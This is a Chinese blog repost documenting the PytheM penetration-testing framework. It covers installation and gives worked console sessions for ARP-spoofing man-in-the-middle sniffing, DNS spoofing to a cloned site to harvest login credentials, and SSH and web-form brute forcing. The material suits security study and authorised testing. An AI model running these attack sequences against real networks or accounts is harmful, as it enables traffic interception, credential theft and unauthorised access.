Python渗透测试框架:PytheM|

  • A+
所属分类:神兵利刃

PytheM是一个Python渗透测试框架。它只能在osnGNU/Linux OS系统上运行。

安装

$sudo apt-get update
$sudo apt-get install libasound-dev libjack-jackd2-dev portaudio19-dev python-pyaudio build-essential python-dev libnetfilter-queue-dev libespeak1 libffi-dev libssl-dev
$sudo git clone https://github.com/m4n3dw0lf/PytheM/
$cd PytheM
$sudo pip install -r requirements.txt

运行

$sudo ./pythem

例子

ARP欺骗-HTTP中间人攻击

命令:

pythem> set interface
[+] Enter the interface: wlan0
pythem> set gateway
[+] Enter the gateway: 192.168.1.1
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> sniff
[+] Enter the filter: http

ARP+DNS欺骗-重定向到伪造的页面,收集登录凭证

使用SET等克隆工具克隆你选中的网站,并部署在Apache2上

命令:

pythem> set target
[+] Enter the target(s): 192.168.0.8
pythem> set interface wlan0
pythem> set gateway 192.168.0.1
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> dnsspoof start
[+] Domain to be spoofed: www.google.com
[+] IP address to be redirected: 192.168.0.6
[+] DNS spoofing initialized.
pythem> sniff dns

SSH暴破-暴力破解

pythem> service ssh start
pythem> set target
[+] Enter the target(s): 127.0.0.1
pythem> set file wordlist.txt
pythem> brute-force ssh
[+] Enter the username to bruteforce: anon123

Web页面参数暴力破解

首先获取web页面登录时的参数格式id= value

显示重定向页面,如果定向到一个不同的页面则说明猜解正确。

命令

pythem> set target http://127.0.0.1/
pythem> set file
[+] Enter the path to the file: wordlist.txt
pythem> brute-force webform
[+] Brute-Form authentication initialized.
[+] Enter the input id of the username box: vSIS_ID
[+] Enter the input id of the password box: vSIS_PASS
[+] Enter the username to brute-force the formulary: root

URL内容爆破

pythem> set target
[+] Enter the target(s): http://testphp.vulnweb.com/index.php?id=
pythem> set file 1to100.txt
pythem> brute-force url
[+] Content URL bruter initialized.

功能

[ PytheM – Penetration Testing Framework v0.3.2 ]

help:

打印帮助信息。

exit/quit:

退出程序。

set:

设置变量的值,参数:

interface

gateway

target

file

arpmode例子:

 pythem> set interface | open input to set

或者

 pythem> set interface wlan0 | don't open input to set value

print:

打印变量的值,例子:

   pythem> print gateway

scan:

进行tcp/manualport/arp扫描.

(应该在设置完网卡和目标后再调用)例子:

 pythem> scan

或者

 pythem> scan tcp

arpspoof:

开始或结束arpspoofing攻击. (使用rep或req可以设置arp欺骗的模式,rep表示欺骗响应,req表示欺骗请求)

参数

start

stop

例子:

arpspoof startarpspoof stop

dnsspoof:

开始dnsspoofing攻击. (应该在arp欺骗攻击开始后再调用)例子:

pythem> dnsspoof startpythem> dnsspoof stop

sniff:

开始嗅探数据包(应该在设置网卡后再调用)例子:

pythem> sniff http

或者

pythem> sniff

[+] Enter the filter: port 1337 and host 10.0.1.5 | tcpdump like format or http,dns specific filter.

pforensic:

开始分析数据包(应该在设置完网卡和.pcap文件后调用)例子:

pythem> pforensicpforensic> help

brute-force:

开始暴力破解攻击(应该在设置完目标和字典文件路径后调用)参数:

ssh | 目标是IP地址ip address as target

url | 目标是url (包含http://或https://) 

webform | 目标是url (包含http://或https://) 

例子:

pythem> brute-force webform

pythem> brute-force ssh

geoip:

显示IP地址的大概位置(应该在设置目标(IP地址)后再调用)例子:

pythem> geoip

或者

pythem> geoip 8.8.8.8

decode and encode:

以选择的模式解码和编码字符串,例子:

pythem> decode base64pythem> encode ascii

cookiedecode:

解码base64 url编码的cookie的值,例子:

pythem> cookiedecode

其它在控制台可以执行的命令,比如cd, ls, nano, cat 等。

Jarvis – 声音控制助手

[*] jarvis   type jarvis-help to see the jarvis help page. 
examples:
pythem> jarvis     (以语音识别模式调用Jarvis)   
pythem> jarvis-help    (打印Jarvis帮助信息)   
pythem> jarvis-log     (检查日志)   
pythem> jarvis-log err (检查错误日志)
pythem> jarvis-say     (命令Jarvis说某些东西)   
pythem> jarvis-say hello my name is jarvis.   
pythem> jarvis-read    (如果没有指定文件,应该在设置文件后再调用)   
pythem> jarvis-read file.txt

*参考来源:n0where.net,安云网转载自FreeBuf.COM

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin